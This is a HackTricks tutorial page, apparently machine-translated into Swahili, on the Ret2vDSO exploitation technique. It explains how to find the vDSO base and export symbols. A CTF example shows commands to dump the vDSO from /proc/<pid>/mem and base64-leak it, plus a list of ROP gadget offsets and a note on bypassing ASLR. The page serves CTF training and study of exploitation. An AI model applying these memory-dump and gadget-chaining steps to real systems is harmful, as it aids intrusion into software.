Ret2vDSO

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Maelezo ya Msingi

Huenda kuna gadgets katika eneo la vDSO, ambalo ni ELF DSO ndogo iliyopangwa na kernel kutoa utekelezaji wa haraka upande wa user-space wa baadhi ya msaada wa kernel. Katika aina hizi za changamoto, kawaida picha ya kernel hutolewa ili dump the vDSO region.

Kupata base ya vDSO na exports

Anwani ya base ya vDSO hupitishwa katika auxiliary vector kama AT_SYSINFO_EHDR, hivyo ikiwa unaweza kusoma /proc/<pid>/auxv (au kupiga getauxval katika mchakato wa msaada), unaweza kupata base bila kutegemea memory leak. Angalia Auxiliary Vector (auxv) and vDSO kwa njia za vitendo za kuipata.

Mara utakapokuwa na base, itazame vDSO kama ELF DSO ya kawaida (linux-vdso.so.1): dump the mapping na tumia readelf -Ws/objdump -d (au kernel reference parser tools/testing/selftests/vDSO/parse_vdso.c) kutatua exported symbols na kutafuta gadgets. Kwenye x86 32-bit vDSO mara nyingi inatoa __kernel_vsyscall, __kernel_sigreturn, na __kernel_rt_sigreturn; kwenye x86_64 exports za kawaida ni __vdso_clock_gettime, __vdso_gettimeofday, na __vdso_time. Kwa kuwa vDSO inatumia symbol versioning, linganisha version inayotarajiwa unapotatua symbols.

Kufuata mfano kutoka https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/maze-of-mist/ inawezekana kuona jinsi ilivyokuwa inawezekana dump the vdso section na kuhamisha kwenye host kwa:

# Find addresses
cat /proc/76/maps
08048000-08049000 r--p 00000000 00:02 317                                /target
08049000-0804a000 r-xp 00001000 00:02 317                                /target
0804a000-0804b000 rw-p 00002000 00:02 317                                /target
f7ff8000-f7ffc000 r--p 00000000 00:00 0                                  [vvar]
f7ffc000-f7ffe000 r-xp 00000000 00:00 0                                  [vdso]
fffdd000-ffffe000 rw-p 00000000 00:00 0                                  [stack]

# Dump it
dd if=/proc/76/mem of=vdso bs=1 skip=$((0xf7ffc000)) count=$((0x2000))
8192+0 records in
8192+0 records out
8192 bytes (8.0KB) copied, 0.901154 seconds, 8.9KB/s

# Compress and leak it
gzip vdso
base64 vdso.gz

# Decompress and check of gadgets
echo '<base64-payload>' | base64 -d | gzip -d - > vdso
file vdso
ROPgadget --binary vdso | grep 'int 0x80'

ROP gadgets zilizopatikana:

vdso_addr = 0xf7ffc000

int_0x80_xor_eax_eax_ret_addr = 0x8049010
bin_sh_addr = 0x804a800

# 0x0000057a : pop edx ; pop ecx ; ret
pop_edx_pop_ecx_ret_addr = vdso_addr + 0x57a

# 0x00000cca : mov dword ptr [edx], ecx ; add esp, 0x34 ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
mov_dword_ptr_edx_ecx_ret_addr = vdso_addr + 0xcca

# 0x00000ccb : or al, byte ptr [ebx + 0x5e5b34c4] ; pop edi ; pop ebp ; ret
or_al_byte_ptr_ebx_pop_edi_pop_ebp_ret_addr = vdso_addr + 0xccb

# 0x0000015cd : pop ebx ; pop esi ; pop ebp ; ret
pop_ebx_pop_esi_pop_ebp_ret = vdso_addr + 0x15cd

Caution

Kumbuka jinsi inaweza kuwa inawezekana kupitisha ASLR kwa kutumia vdso ikiwa kernel imejengwa na CONFIG_COMPAT_VDSO kwani anwani ya vdso haitapangwa kwa nasibu: https://vigilance.fr/vulnerability/Linux-kernel-bypassing-ASLR-via-VDSO-11639

ARM64

Baada ya dump na kuangalia sehemu ya vdso ya binary katika kali 2023.2 arm64, sikuweza kupata gadget yoyote ya kuvutia (hakuna njia ya kudhibiti registers kutoka kwa values kwenye stack au kudhibiti x30 kwa ret) isipokuwa njia ya kuita SROP. Angalia maelezo zaidi kwenye mfano kutoka ukurasa:

SROP - arm64

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks